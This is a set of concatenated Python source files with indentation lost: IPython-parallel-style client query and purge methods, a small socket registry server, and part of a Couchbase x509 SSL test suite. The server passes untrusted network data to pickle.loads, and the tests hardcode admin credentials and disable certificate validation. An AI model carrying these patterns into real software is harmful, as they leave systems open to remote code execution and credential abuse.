#--------------------------------------------------------------------------
# Query methods
#--------------------------------------------------------------------------
@spin_first
def get_result(self, indices_or_msg_ids=None, block=None):
"""Retrieve a result by msg_id or history index, wrapped in an AsyncResult object.
If the client already has the results, no request to the Hub will be made.
This is a convenient way to construct AsyncResult objects, which are wrappers
that include metadata about execution, and allow for awaiting results that
were not submitted by this Client.
It can also be a convenient way to retrieve the metadata associated with
blocking execution, since it always retrieves
Examples
--------
::
In [10]: r = client.apply()
Parameters
----------
indices_or_msg_ids : integer history index, str msg_id, or list of either
The indices or msg_ids of indices to be retrieved
block : bool
Whether to wait for the result to be done
Returns
-------
AsyncResult
A single AsyncResult object will always be returned.
AsyncHubResult
A subclass of AsyncResult that retrieves results from the Hub
"""
block = self.block if block is None else block
if indices_or_msg_ids is None:
indices_or_msg_ids = -1
single_result = False
if not isinstance(indices_or_msg_ids, (list,tuple)):
indices_or_msg_ids = [indices_or_msg_ids]
single_result = True
theids = []
for id in indices_or_msg_ids:
if isinstance(id, int):
id = self.history[id]
if not isinstance(id, str):
raise TypeError("indices must be str or int, not %r"%id)
theids.append(id)
local_ids = [msg_id for msg_id in theids if msg_id in self.outstanding or msg_id in self.results]
remote_ids = [msg_id for msg_id in theids if msg_id not in local_ids]
# given single msg_id initially, get_result shot get the result itself,
# not a length-one list
if single_result:
theids = theids[0]
if remote_ids:
ar = AsyncHubResult(self, msg_ids=theids)
else:
ar = AsyncResult(self, msg_ids=theids)
if block:
ar.wait()
return ar
@spin_first
def resubmit(self, indices_or_msg_ids=None, metadata=None, block=None):
"""Resubmit one or more tasks.
in-flight tasks may not be resubmitted.
Parameters
----------
indices_or_msg_ids : integer history index, str msg_id, or list of either
The indices or msg_ids of indices to be retrieved
block : bool
Whether to wait for the result to be done
Returns
-------
AsyncHubResult
A subclass of AsyncResult that retrieves results from the Hub
"""
block = self.block if block is None else block
if indices_or_msg_ids is None:
indices_or_msg_ids = -1
if not isinstance(indices_or_msg_ids, (list,tuple)):
indices_or_msg_ids = [indices_or_msg_ids]
theids = []
for id in indices_or_msg_ids:
if isinstance(id, int):
id = self.history[id]
if not isinstance(id, str):
raise TypeError("indices must be str or int, not %r"%id)
theids.append(id)
content = dict(msg_ids = theids)
self.session.send(self._query_socket, 'resubmit_request', content)
zmq.select([self._query_socket], [], [])
idents,msg = self.session.recv(self._query_socket, zmq.NOBLOCK)
if self.debug:
pprint(msg)
content = msg['content']
if content['status'] != 'ok':
raise self._unwrap_exception(content)
mapping = content['resubmitted']
new_ids = [ mapping[msg_id] for msg_id in theids ]
ar = AsyncHubResult(self, msg_ids=new_ids)
if block:
ar.wait()
return ar
@spin_first
def result_status(self, msg_ids, status_only=True):
"""Check on the status of the result(s) of the apply request with `msg_ids`.
If status_only is False, then the actual results will be retrieved, else
only the status of the results will be checked.
Parameters
----------
msg_ids : list of msg_ids
if int:
Passed as index to self.history for convenience.
status_only : bool (default: True)
if False:
Retrieve the actual results of completed tasks.
Returns
-------
results : dict
There will always be the keys 'pending' and 'completed', which will
be lists of msg_ids that are incomplete or complete. If `status_only`
is False, then completed results will be keyed by their `msg_id`.
"""
if not isinstance(msg_ids, (list,tuple)):
msg_ids = [msg_ids]
theids = []
for msg_id in msg_ids:
if isinstance(msg_id, int):
msg_id = self.history[msg_id]
if not isinstance(msg_id, str):
raise TypeError("msg_ids must be str, not %r"%msg_id)
theids.append(msg_id)
completed = []
local_results = {}
# comment this block out to temporarily disable local shortcut:
for msg_id in theids:
if msg_id in self.results:
completed.append(msg_id)
local_results[msg_id] = self.results[msg_id]
theids.remove(msg_id)
if theids: # some not locally cached
content = dict(msg_ids=theids, status_only=status_only)
msg = self.session.send(self._query_socket, "result_request", content=content)
zmq.select([self._query_socket], [], [])
idents,msg = self.session.recv(self._query_socket, zmq.NOBLOCK)
if self.debug:
pprint(msg)
content = msg['content']
if content['status'] != 'ok':
raise self._unwrap_exception(content)
buffers = msg['buffers']
else:
content = dict(completed=[],pending=[])
content['completed'].extend(completed)
if status_only:
return content
failures = []
# load cached results into result:
content.update(local_results)
# update cache with results:
for msg_id in sorted(theids):
if msg_id in content['completed']:
rec = content[msg_id]
parent = rec['header']
header = rec['result_header']
rcontent = rec['result_content']
iodict = rec['io']
if isinstance(rcontent, str):
rcontent = self.session.unpack(rcontent)
md = self.metadata[msg_id]
md_msg = dict(
content=rcontent,
parent_header=parent,
header=header,
metadata=rec['result_metadata'],
)
md.update(self._extract_metadata(md_msg))
if rec.get('received'):
md['received'] = rec['received']
md.update(iodict)
if rcontent['status'] == 'ok':
if header['msg_type'] == 'apply_reply':
res,buffers = serialize.unserialize_object(buffers)
elif header['msg_type'] == 'execute_reply':
res = ExecuteReply(msg_id, rcontent, md)
else:
raise KeyError("unhandled msg type: %r" % header['msg_type'])
else:
res = self._unwrap_exception(rcontent)
failures.append(res)
self.results[msg_id] = res
content[msg_id] = res
if len(theids) == 1 and failures:
raise failures[0]
error.collect_exceptions(failures, "result_status")
return content
@spin_first
def queue_status(self, targets='all', verbose=False):
"""Fetch the status of engine queues.
Parameters
----------
targets : int/str/list of ints/strs
the engines whose states are to be queried.
default : all
verbose : bool
Whether to return lengths only, or lists of ids for each element
"""
if targets == 'all':
# allow 'all' to be evaluated on the engine
engine_ids = None
else:
engine_ids = self._build_targets(targets)[1]
content = dict(targets=engine_ids, verbose=verbose)
self.session.send(self._query_socket, "queue_request", content=content)
idents,msg = self.session.recv(self._query_socket, 0)
if self.debug:
pprint(msg)
content = msg['content']
status = content.pop('status')
if status != 'ok':
raise self._unwrap_exception(content)
content = rekey(content)
if isinstance(targets, int):
return content[targets]
else:
return content
def _build_msgids_from_target(self, targets=None):
"""Build a list of msg_ids from the list of engine targets"""
if not targets: # needed as _build_targets otherwise uses all engines
return []
target_ids = self._build_targets(targets)[0]
return [md_id for md_id in self.metadata if self.metadata[md_id]["engine_uuid"] in target_ids]
def _build_msgids_from_jobs(self, jobs=None):
"""Build a list of msg_ids from "jobs" """
if not jobs:
return []
msg_ids = []
if isinstance(jobs, (str,AsyncResult)):
jobs = [jobs]
bad_ids = [obj for obj in jobs if not isinstance(obj, (str, AsyncResult))]
if bad_ids:
raise TypeError("Invalid msg_id type %r, expected str or AsyncResult"%bad_ids[0])
for j in jobs:
if isinstance(j, AsyncResult):
msg_ids.extend(j.msg_ids)
else:
msg_ids.append(j)
return msg_ids
def purge_local_results(self, jobs=[], targets=[]):
"""Clears the client caches of results and frees such memory.
Individual results can be purged by msg_id, or the entire
history of specific targets can be purged.
Use `purge_local_results('all')` to scrub everything from the Clients's db.
The client must have no outstanding tasks before purging the caches.
Raises `AssertionError` if there are still outstanding tasks.
After this call all `AsyncResults` are invalid and should be discarded.
If you must "reget" the results, you can still do so by using
`client.get_result(msg_id)` or `client.get_result(asyncresult)`. This will
redownload the results from the hub if they are still available
(i.e `client.purge_hub_results(...)` has not been called.
Parameters
----------
jobs : str or list of str or AsyncResult objects
the msg_ids whose results should be purged.
targets : int/str/list of ints/strs
The targets, by int_id, whose entire results are to be purged.
default : None
"""
assert not self.outstanding, "Can't purge a client with outstanding tasks!"
if not targets and not jobs:
raise ValueError("Must specify at least one of `targets` and `jobs`")
if jobs == 'all':
self.results.clear()
self.metadata.clear()
return
else:
msg_ids = []
msg_ids.extend(self._build_msgids_from_target(targets))
msg_ids.extend(self._build_msgids_from_jobs(jobs))
list(map(self.results.pop, msg_ids))
list(map(self.metadata.pop, msg_ids))
@spin_first
def purge_hub_results(self, jobs=[], targets=[]):
"""Tell the Hub to forget results.
Individual results can be purged by msg_id, or the entire
history of specific targets can be purged.
Use `purge_results('all')` to scrub everything from the Hub's db.
Parameters
----------
jobs : str or list of str or AsyncResult objects
the msg_ids whose results should be forgotten.
targets : int/str/list of ints/strs
The targets, by int_id, whose entire history is to be purged.
default : None
"""
if not targets and not jobs:
raise ValueError("Must specify at least one of `targets` and `jobs`")
if targets:
targets = self._build_targets(targets)[1]
# construct msg_ids from jobs
if jobs == 'all':
msg_ids = jobs
else:
msg_ids = self._build_msgids_from_jobs(jobs)
content = dict(engine_ids=targets, msg_ids=msg_ids)
self.session.send(self._query_socket, "purge_request", content=content)
idents, msg = self.session.recv(self._query_socket, 0)
if self.debug:
pprint(msg)
content = msg['content']
if content['status'] != 'ok':
raise self._unwrap_exception(content)
def purge_results(self, jobs=[], targets=[]):
"""Clears the cached results from both the hub and the local client
Individual results can be purged by msg_id, or the entire
history of specific targets can be purged.
Use `purge_results('all')` to scrub every cached result from both the Hub's and
the Client's db.
Equivalent to calling both `purge_hub_results()` and `purge_client_results()` with
the same arguments.
Parameters
----------
jobs : str or list of str or AsyncResult objects
the msg_ids whose results should be forgotten.
targets : int/str/list of ints/strs
The targets, by int_id, whose entire history is to be purged.
default : None
"""
self.purge_local_results(jobs=jobs, targets=targets)
self.purge_hub_results(jobs=jobs, targets=targets)
def purge_everything(self):
"""Clears all content from previous Tasks from both the hub and the local client
In addition to calling `purge_results("all")` it also deletes the history and
other bookkeeping lists.
"""
self.purge_results("all")
self.history = []
self.session.digest_history.clear()
@spin_first
def hub_history(self):
"""Get the Hub's history
Just like the Client, the Hub has a history, which is a list of msg_ids.
This will contain the history of all clients, and, depending on configuration,
may contain history across multiple cluster sessions.
Any msg_id returned here is a valid argument to `get_result`.
Returns
-------
msg_ids : list of strs
list of all msg_ids, ordered by task submission time.
"""
self.session.send(self._query_socket, "history_request", content={})
idents, msg = self.session.recv(self._query_socket, 0)
if self.debug:
pprint(msg)
content = msg['content']
if content['status'] != 'ok':
raise self._unwrap_exception(content)
else:
return content['history']
@spin_first
def db_query(self, query, keys=None):
"""Query the Hub's TaskRecord database
This will return a list of task record dicts that match `query`
Parameters
----------
query : mongodb query dict
The search dict. See mongodb query docs for details.
keys : list of strs [optional]
The subset of keys to be returned. The default is to fetch everything but buffers.
'msg_id' will *always* be included.
"""
if isinstance(keys, str):
keys = [keys]
content = dict(query=query, keys=keys)
self.session.send(self._query_socket, "db_request", content=content)
idents, msg = self.session.recv(self._query_socket, 0)
if self.debug:
pprint(msg)
content = msg['content']
if content['status'] != 'ok':
raise self._unwrap_exception(content)
records = content['records']
buffer_lens = content['buffer_lens']
result_buffer_lens = content['result_buffer_lens']
buffers = msg['buffers']
has_bufs = buffer_lens is not None
has_rbufs = result_buffer_lens is not None
for i,rec in enumerate(records):
# relink buffers
if has_bufs:
blen = buffer_lens[i]
rec['buffers'], buffers = buffers[:blen],buffers[blen:]
if has_rbufs:
blen = result_buffer_lens[i]
rec['result_buffers'], buffers = buffers[:blen],buffers[blen:]
return records
__all__ = [ 'Client' ]
|
CenterServer.py
|
import socket
from threading import Thread
import time
import pickle
address = ('127.0.0.1', 11451)
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
models: dict[str, list] = {} # 模型列表
dataGroups: dict[str, tuple] = {} # 数据列表
def registerModelServer(address, modelName):
"""
注册一个模型服务器
"""
if models.get(modelName) is None:
models[modelName] = []
models[modelName].append(address)
def registerDataServer(address, dataGroupName, count) -> bool:
"""
注册一个数据集服务器,提供名称,数据集大小两种信息
"""
if dataGroups.get(dataGroupName) is None:
dataGroups[dataGroupName] = (address, count)
return True
else:
return False
def getInfos():
s1 = list(models.keys())
s2 = [len(it) for it in models.values()]
s3 = list(dataGroups.keys())
s4 = [it[1] for it in dataGroups.values()]
return pickle.dumps((s1, s2, s3, s4))
def requestProcess():
while True:
client, addr = server.accept()
data = client.recv(8)
try:
if b'000' == data:
# 模型服务器注册
client.sendall(b'ok')
data = client.recv(1024)
addr, modelName = pickle.loads(data)
registerModelServer(addr, modelName)
client.sendall(b'ok')
elif b'111' == data:
# 模型服务器注销
print('')
elif b'222' == data:
# 数据集服务器注册
client.sendall(b'ok')
data = client.recv(1024)
addr, dataGroupName, count = pickle.loads(data)
if registerDataServer(addr, dataGroupName, count):
client.sendall(b'ok')
else:
client.sendall(b'fail')
elif b'333' == data:
# 数据集服务器注销
print('')
elif b'444' == data:
# 请求模型、数据集信息
data = getInfos()
client.sendall(data)
elif b'555' == data:
# 请求模型服务器地址
client.sendall(b'ok')
data = client.recv(1024)
key = pickle.loads(data)
if models.get(key) is None:
client.sendall(b'fail')
else:
ret = models[key][0]
data = pickle.dumps(ret)
client.sendall(data)
elif b'666' == data:
# 请求数据集服务器地址
client.sendall(b'ok')
data = client.recv(1024)
key = pickle.loads(data)
if dataGroups.get(key) is None:
client.sendall(b'fail')
else:
ret = dataGroups[key][0]
data = pickle.dumps(ret)
client.sendall(data)
else:
client.sendall(b'fail')
except BaseException:
print(data)
client.sendall(b'fail')
client.close()
if '__main__' == __name__:
thd = Thread(target=requestProcess)
thd.daemon = True
server.bind(address)
server.listen(5)
thd.start()
while True:
s = input()
if 'stop' == s:
server.close()
break
elif 'test' == s:
print(models)
print(dataGroups)
print(getInfos())
else:
print('No such command')
print('stop - stop server')
print('test - output some test infomation')
|
x509tests.py
|
from basetestcase import BaseTestCase
from security.x509main import x509main
# from newupgradebasetest import NewUpgradeBaseTest
from membase.api.rest_client import RestConnection, RestHelper
import subprocess
import json
import socket
from couchbase.bucket import Bucket
from threading import Thread, Event
from remote.remote_util import RemoteMachineShellConnection
from security.auditmain import audit
from security.rbac_base import RbacBase
import os, subprocess
import copy
from couchbase.cluster import Cluster
from couchbase.cluster import PasswordAuthenticator
from ep_mc_bin_client import MemcachedClient
from security.ntonencryptionBase import ntonencryptionBase
from lib.Cb_constants.CBServer import CbServer
class x509tests(BaseTestCase):
def setUp(self):
super(x509tests, self).setUp()
self._reset_original()
self.ip_address = self.getLocalIPAddress()
self.ip_address = '172.16.1.174'
self.root_ca_path = x509main.CACERTFILEPATH + x509main.CACERTFILE
SSLtype = self.input.param("SSLtype", "go")
encryption_type = self.input.param('encryption_type', "")
key_length = self.input.param("key_length", 1024)
# Input parameters for state, path, delimeters and prefixes
self.client_cert_state = self.input.param("client_cert_state", "disable")
self.paths = self.input.param('paths', "subject.cn:san.dnsname:san.uri").split(":")
self.prefixs = self.input.param('prefixs', 'www.cb-:us.:www.').split(":")
self.delimeters = self.input.param('delimeter', '.:.:.') .split(":")
self.setup_once = self.input.param("setup_once", False)
self.upload_json_mode = self.input.param("upload_json_mode", 'rest')
self.sdk_version = self.input.param('sdk_version', 'pre-vulcan')
self.dns = self.input.param('dns', None)
self.uri = self.input.param('uri', None)
self.enable_nton_local = self.input.param('enable_nton_local',False)
self.local_clusterEncryption = self.input.param('local_clusterEncryption','control')
self.wildcard_dns = self.input.param('wildcard_dns',None)
copy_servers = copy.deepcopy(self.servers)
# Generate cert and pass on the client ip for cert generation
if (self.dns is not None) or (self.uri is not None):
x509main(self.master)._generate_cert(copy_servers, type=SSLtype, encryption=encryption_type, key_length=key_length, client_ip=self.ip_address, alt_names='non_default', dns=self.dns, uri=self.uri,wildcard_dns=self.wildcard_dns)
else:
x509main(self.master)._generate_cert(copy_servers, type=SSLtype, encryption=encryption_type, key_length=key_length, client_ip=self.ip_address,wildcard_dns=self.wildcard_dns)
self.log.info(" Path is {0} - Prefixs - {1} -- Delimeters - {2}".format(self.paths, self.prefixs, self.delimeters))
if (self.setup_once):
x509main(self.master).setup_master(self.client_cert_state, self.paths, self.prefixs, self.delimeters, self.upload_json_mode)
x509main().setup_cluster_nodes_ssl(self.servers)
# reset the severs to ipv6 if there were ipv6
'''
for server in self.servers:
if server.ip.count(':') > 0:
# raw ipv6? enclose in square brackets
server.ip = '[' + server.ip + ']'
'''
self.log.info (" list of server {0}".format(self.servers))
self.log.info (" list of server {0}".format(copy_servers))
enable_audit = self.input.param('audit', None)
if enable_audit:
Audit = audit(host=self.master)
currentState = Audit.getAuditStatus()
self.log.info ("Current status of audit on ip - {0} is {1}".format(self.master.ip, currentState))
if not currentState:
self.log.info ("Enabling Audit ")
Audit.setAuditEnable('true')
self.sleep(30)
self.protocol = "http"
self.disable_ssl_certificate_validation = False
self.rest_port = CbServer.port
self.n1ql_port = CbServer.n1ql_port
self.cbas_port = CbServer.cbas_port
self.fts_port = CbServer.fts_port
if CbServer.use_https:
self.protocol = "https"
self.disable_ssl_certificate_validation = True
self.rest_port = CbServer.ssl_port
self.n1ql_port = CbServer.ssl_n1ql_port
self.cbas_port = CbServer.ssl_cbas_port
self.fts_port = CbServer.ssl_fts_port
def tearDown(self):
self.log.info ("Into Teardown")
self._reset_original()
shell = RemoteMachineShellConnection(x509main.SLAVE_HOST)
shell.execute_command("rm " + x509main.CACERTFILEPATH)
super(x509tests, self).tearDown()
def _reset_original(self):
self.log.info ("Reverting to original state - regenerating certificate and removing inbox folder")
tmp_path = "/tmp/abcd.pem"
for servers in self.servers:
cli_command = "ssl-manage"
remote_client = RemoteMachineShellConnection(servers)
options = "--regenerate-cert={0}".format(tmp_path)
output, error = remote_client.execute_couchbase_cli(cli_command=cli_command, options=options,
cluster_host=servers.cluster_ip, user="Administrator",
password="password")
x509main(servers)._delete_inbox_folder()
def checkConfig(self, eventID, host, expectedResults):
Audit = audit(eventID=eventID, host=host)
currentState = Audit.getAuditStatus()
self.log.info ("Current status of audit on ip - {0} is {1}".format(self.master.ip, currentState))
if not currentState:
self.log.info ("Enabling Audit ")
Audit.setAuditEnable('true')
self.sleep(30)
fieldVerification, valueVerification = Audit.validateEvents(expectedResults)
self.assertTrue(fieldVerification, "One of the fields is not matching")
self.assertTrue(valueVerification, "Values for one of the fields is not matching")
def getLocalIPAddress(self):
'''
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('couchbase.com', 0))
return s.getsockname()[0]
'''
status, ipAddress = subprocess.getstatusoutput("ifconfig en0 | grep 'inet addr:' | cut -d: -f2 |awk '{print $1}'")
if '1' not in ipAddress:
status, ipAddress = subprocess.getstatusoutput("ifconfig eth0 | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | awk '{print $2}'")
return ipAddress
def createBulkDocuments(self, client):
start_num = 0
end_num = 10000
key1 = 'demo_key'
value1 = {
"name":"demo_value",
"lastname":'lastname',
"areapin":'',
"preference":'veg',
"type":''
}
for x in range (start_num, end_num):
value = value1.copy()
key = 'demo_key'
key = key + str(x)
for key1 in value:
if value[key1] == 'type' and x % 2 == 0:
value['type'] = 'odd'
else:
value['type'] = 'even'
value[key1] = value[key1] + str(x)
value['id'] = str(x)
result = client.upsert(key, value)
def check_rebalance_complete(self, rest):
progress = None
count = 0
while (progress == 'running' or count < 10):
progress = rest._rebalance_progress_status()
self.sleep(10)
count = count + 1
if progress == 'none':
return True
else:
return False
def _sdk_connection(self, root_ca_path=x509main.CACERTFILEPATH + x509main.CACERTFILE, bucket='default', host_ip=None):
self.sleep(10)
result = False
self.add_built_in_server_user([{'id': bucket, 'name': bucket, 'password': 'password'}], \
[{'id': bucket, 'name': bucket, 'roles': 'admin'}], self.master)
self.add_built_in_server_user([{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'password': 'password'}], \
[{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'roles': 'admin'}], self.master)
self.sleep(10)
if self.sdk_version == 'pre-vulcan':
connection_string = 'couchbases://' + host_ip + '/' + bucket + '?certpath=' + root_ca_path
self.log.info("Connection string is -{0}".format(connection_string))
try:
cb = Bucket(connection_string, password='password')
if cb is not None:
result = True
return result, cb
except Exception as ex:
self.log.info("Expection is -{0}".format(ex))
elif self.sdk_version == 'vulcan':
key_file = x509main.CACERTFILEPATH + self.ip_address + ".key"
chain_file = x509main.CACERTFILEPATH + "/long_chain" + self.ip_address + ".pem"
connection_string = 'couchbases://' + host_ip + '/?ipv6=allow&certpath=' + chain_file + "&keypath=" + key_file
self.log.info("Connection string is -{0}".format(connection_string))
try:
cluster = Cluster(connection_string);
cb = cluster.open_bucket(bucket)
if cb is not None:
result = True
self.log.info('SDK connection created successfully')
return result, cb
except Exception as ex:
self.log.info("Expection is -{0}".format(ex))
return result
def test_bucket_select_audit(self):
# security.x509tests.x509tests.test_bucket_select_audit
eventID = 20492
mc = MemcachedClient(self.master.ip, 11210)
mc.sasl_auth_plain(self.master.rest_username, self.master.rest_password)
mc.bucket_select('default')
expectedResults = {"bucket":"default","description":"The specified bucket was selected","id":20492,"name":"select bucket" \
,"peername":"127.0.0.1:46539","real_userid":{"domain":"memcached","user":"@ns_server"},"sockname":"127.0.0.1:11209"}
Audit = audit(eventID=eventID, host=self.master)
actualEvent = Audit.returnEvent(eventID)
Audit.validateData(actualEvent, expectedResults)
def test_basic_ssl_test(self):
x509main(self.master).setup_master()
status = x509main(self.master)._validate_ssl_login()
self.assertEqual(status, 200, "Not able to login via SSL code")
def test_error_without_node_chain_certificates(self):
x509main(self.master)._upload_cluster_ca_certificate("Administrator", 'password')
status, content = x509main(self.master)._reload_node_certificate(self.master)
content = str(content)
self.assertEqual(status['status'], '400', "Issue with status with node certificate are missing")
self.assertTrue('Unable to read certificate chain file' in str(content), "Incorrect message from the system")
def test_error_without_chain_cert(self):
x509main(self.master)._upload_cluster_ca_certificate("Administrator", 'password')
x509main(self.master)._setup_node_certificates(chain_cert=False)
status, content = x509main(self.master)._reload_node_certificate(self.master)
content = str(content)
self.assertEqual(status['status'], '400', "Issue with status with node certificate are missing")
self.assertTrue('Unable to read certificate chain file' in str(content) , "Incorrect message from the system")
def test_error_without_node_key(self):
x509main(self.master)._upload_cluster_ca_certificate("Administrator", 'password')
x509main(self.master)._setup_node_certificates(node_key=False)
status, content = x509main(self.master)._reload_node_certificate(self.master)
self.assertEqual(status['status'], '400', "Issue with status with node key is missing")
self.assertTrue('Unable to read private key file' in content, "Incorrect message from the system")
def test_add_node_without_cert(self):
rest = RestConnection(self.master)
servs_inout = self.servers[1]
x509main(self.master).setup_master()
try:
rest.add_node('Administrator', 'password', servs_inout.ip)
except Exception as ex:
ex = str(ex)
# expected_result = "Error adding node: " + servs_inout.ip + " to the cluster:" + self.master.ip + " - [\"Prepare join failed. Error applying node certificate. Unable to read certificate chain file\"]"
expected_result = "Error adding node: " + servs_inout.ip + " to the cluster:" + self.master.ip
self.assertTrue(expected_result in ex, "Incorrect Error message in exception")
expected_result = "Error applying node certificate. Unable to read certificate chain file"
self.assertTrue(expected_result in ex, "Incorrect Error message in exception")
expected_result = "The file does not exist."
self.assertTrue(expected_result in ex, "Incorrect Error message in exception")
def test_add_node_with_cert(self):
servs_inout = self.servers[1:]
rest = RestConnection(self.master)
for node in servs_inout:
x509main(node).setup_master()
known_nodes = ['ns_1@' + self.master.ip]
for server in servs_inout:
rest.add_node('Administrator', 'password', server.ip)
known_nodes.append('ns_1@' + server.ip)
rest.rebalance(known_nodes)
self.assertTrue(self.check_rebalance_complete(rest), "Issue with rebalance")
for server in self.servers:
status = x509main(server)._validate_ssl_login()
self.assertEqual(status, 200, "Not able to login via SSL code")
def test_add_remove_add_back_node_with_cert(self, rebalance=None):
rebalance = self.input.param('rebalance')
rest = RestConnection(self.master)
servs_inout = self.servers[1:3]
serv_out = 'ns_1@' + servs_inout[1].ip
known_nodes = ['ns_1@' + self.master.ip]
x509main(self.master).setup_master()
for node in servs_inout:
x509main(node).setup_master()
for server in servs_inout:
rest.add_node('Administrator', 'password', server.ip)
known_nodes.append('ns_1@' + server.ip)
rest.rebalance(known_nodes)
self.assertTrue(self.check_rebalance_complete(rest), "Issue with rebalance")
for server in servs_inout:
status = x509main(server)._validate_ssl_login()
self.assertEqual(status, 200, "Not able to login via SSL code")
rest.fail_over(serv_out, graceful=False)
if (rebalance):
rest.rebalance(known_nodes, [serv_out])
self.assertTrue(self.check_rebalance_complete(rest), "Issue with rebalance")
rest.add_node('Administrator', 'password', servs_inout[1].ip)
else:
rest.add_back_node(serv_out)
rest.rebalance(known_nodes)
self.assertTrue(self.check_rebalance_complete(rest), "Issue with rebalance")
for server in servs_inout:
response = x509main(server)._validate_ssl_login()
self.assertEqual(status, 200, "Not able to login via SSL code")
def test_add_remove_graceful_add_back_node_with_cert(self, recovery_type=None):
recovery_type = self.input.param('recovery_type')
rest = RestConnection(self.master)
known_nodes = ['ns_1@' + self.master.ip]
progress = None
count = 0
servs_inout = self.servers[1:]
serv_out = 'ns_1@' + servs_inout[1].ip
rest.create_bucket(bucket='default', ramQuotaMB=100)
x509main(self.master).setup_master()
for node in servs_inout:
x509main(node).setup_master()
for server in servs_inout:
rest.add_node('Administrator', 'password', server.ip)
known_nodes.append('ns_1@' + server.ip)
rest.rebalance(known_nodes)
self.assertTrue(self.check_rebalance_complete(rest), "Issue with rebalance")
for server in servs_inout:
status = x509main(server)._validate_ssl_login()
self.assertEqual(status, 200, "Not able to login via SSL code")
rest.fail_over(serv_out, graceful=True)
self.assertTrue(self.check_rebalance_complete(rest), "Issue with rebalance")
rest.set_recovery_type(serv_out, recovery_type)
rest.add_back_node(serv_out)
rest.rebalance(known_nodes)
self.assertTrue(self.check_rebalance_complete(rest), "Issue with rebalance")
for server in servs_inout:
status = x509main(server)._validate_ssl_login()
self.assertEqual(status, 200, "Not able to login via SSL code")
def test_add_remove_autofailover(self):
rest = RestConnection(self.master)
serv_out = self.servers[3]
shell = RemoteMachineShellConnection(serv_out)
known_nodes = ['ns_1@' + self.master.ip]
rest.create_bucket(bucket='default', ramQuotaMB=100)
rest.update_autofailover_settings(True, 30)
x509main(self.master).setup_master()
for node in self.servers[1:4]:
x509main(node).setup_master()
for server in self.servers[1:4]:
rest.add_node('Administrator', 'password', server.ip)
known_nodes.append('ns_1@' + server.ip)
rest.rebalance(known_nodes)
self.assertTrue(self.check_rebalance_complete(rest), "Issue with rebalance")
shell.stop_server()
self.sleep(60)
shell.start_server()
self.sleep(30)
for server in self.servers[1:4]:
status = x509main(server)._validate_ssl_login()
self.assertEqual(status, 200, "Not able to login via SSL code")
def test_add_node_with_cert_non_master(self):
rest = RestConnection(self.master)
for node in self.servers[:3]:
x509main(node).setup_master()
servs_inout = self.servers[1]
rest.add_node('Administrator', 'password', servs_inout.ip)
known_nodes = ['ns_1@' + self.master.ip, 'ns_1@' + servs_inout.ip]
rest.rebalance(known_nodes)
self.assertTrue(self.check_rebalance_complete(rest), "Issue with rebalance")
rest = RestConnection(self.servers[1])
servs_inout = self.servers[2]
rest.add_node('Administrator', 'password', servs_inout.ip)
known_nodes = ['ns_1@' + self.master.ip, 'ns_1@' + servs_inout.ip, 'ns_1@' + self.servers[1].ip]
rest.rebalance(known_nodes)
self.assertTrue(self.check_rebalance_complete(rest), "Issue with rebalance")
for server in self.servers[:3]:
status = x509main(server)._validate_ssl_login()
self.assertEqual(status, 200, "Not able to login via SSL code for ip - {0}".format(server.ip))
# simple xdcr with ca cert
def test_basic_xdcr_with_cert(self):
cluster1 = self.servers[0:2]
cluster2 = self.servers[2:4]
remote_cluster_name = 'sslcluster'
restCluster1 = RestConnection(cluster1[0])
restCluster2 = RestConnection(cluster2[0])
try:
# Setup cluster1
x509main(cluster1[0]).setup_master()
x509main(cluster1[1])._setup_node_certificates(reload_cert=False)
restCluster1.create_bucket(bucket='default', ramQuotaMB=100)
restCluster1.remove_all_replications()
restCluster1.remove_all_remote_clusters()
# Setup cluster2
x509main(cluster2[0]).setup_master()
x509main(cluster2[1])._setup_node_certificates(reload_cert=False)
restCluster2.create_bucket(bucket='default', ramQuotaMB=100)
self.sleep(20)
test = x509main.CACERTFILEPATH + x509main.CACERTFILE
data = open(test, 'rb').read()
restCluster1.add_remote_cluster(cluster2[0].ip, cluster2[0].port, 'Administrator', 'password', remote_cluster_name, certificate=data)
self.sleep(20)
replication_id = restCluster1.start_replication('continuous', 'default', remote_cluster_name)
if replication_id is not None:
self.assertTrue(True, "Replication was not created successfully")
except Exception as ex:
self.log.info("Exception is -{0}".format(ex))
finally:
restCluster2.delete_bucket()
restCluster1.remove_all_replications()
restCluster1.remove_all_remote_clusters()
# simple xdcr with ca cert updated at source and destination, re-generate new certs
def test_basic_xdcr_with_cert_regenerate(self):
cluster1 = self.servers[0:2]
cluster2 = self.servers[2:4]
remote_cluster_name = 'sslcluster'
restCluster1 = RestConnection(cluster1[0])
restCluster2 = RestConnection(cluster2[0])
try:
# Setup cluster1
x509main(cluster1[0]).setup_master()
x509main(cluster1[1])._setup_node_certificates(reload_cert=False)
restCluster1.remove_all_replications()
restCluster1.remove_all_remote_clusters()
restCluster1.create_bucket(bucket='default', ramQuotaMB=100)
# Setup cluster2
x509main(cluster2[0]).setup_master()
x509main(cluster2[1])._setup_node_certificates(reload_cert=False)
restCluster2.create_bucket(bucket='default', ramQuotaMB=100)
test = x509main.CACERTFILEPATH + x509main.CACERTFILE
data = open(test, 'rb').read()
restCluster1.add_remote_cluster(cluster2[0].ip, cluster2[0].port, 'Administrator', 'password', remote_cluster_name, certificate=data)
self.sleep(20)
replication_id = restCluster1.start_replication('continuous', 'default', remote_cluster_name)
# restCluster1.set_xdcr_param('default','default','pauseRequested',True)
x509main(self.master)._delete_inbox_folder()
x509main(self.master)._generate_cert(self.servers, type='openssl', root_cn="CB\ Authority", client_ip=self.ip_address)
self.log.info ("Setting up the first cluster for new certificate")
x509main(cluster1[0]).setup_master()
x509main(cluster1[1])._setup_node_certificates(reload_cert=False)
self.log.info ("Setting up the second cluster for new certificate")
x509main(cluster2[0]).setup_master()
x509main(cluster2[1])._setup_node_certificates(reload_cert=False)
status = restCluster1.is_replication_paused('default', 'default')
if not status:
restCluster1.set_xdcr_param('default', 'default', 'pauseRequested', False)
restCluster1.set_xdcr_param('default', 'default', 'pauseRequested', True)
status = restCluster1.is_replication_paused('default', 'default')
self.assertTrue(status, "Replication has not started after certificate upgrade")
finally:
restCluster2.delete_bucket()
restCluster1.remove_all_replications()
restCluster1.remove_all_remote_clusters()
# source ca and destination self_signed
def test_xdcr_destination_self_signed_cert(self):
cluster1 = self.servers[0:2]
cluster2 = self.servers[2:4]
remote_cluster_name = 'sslcluster'
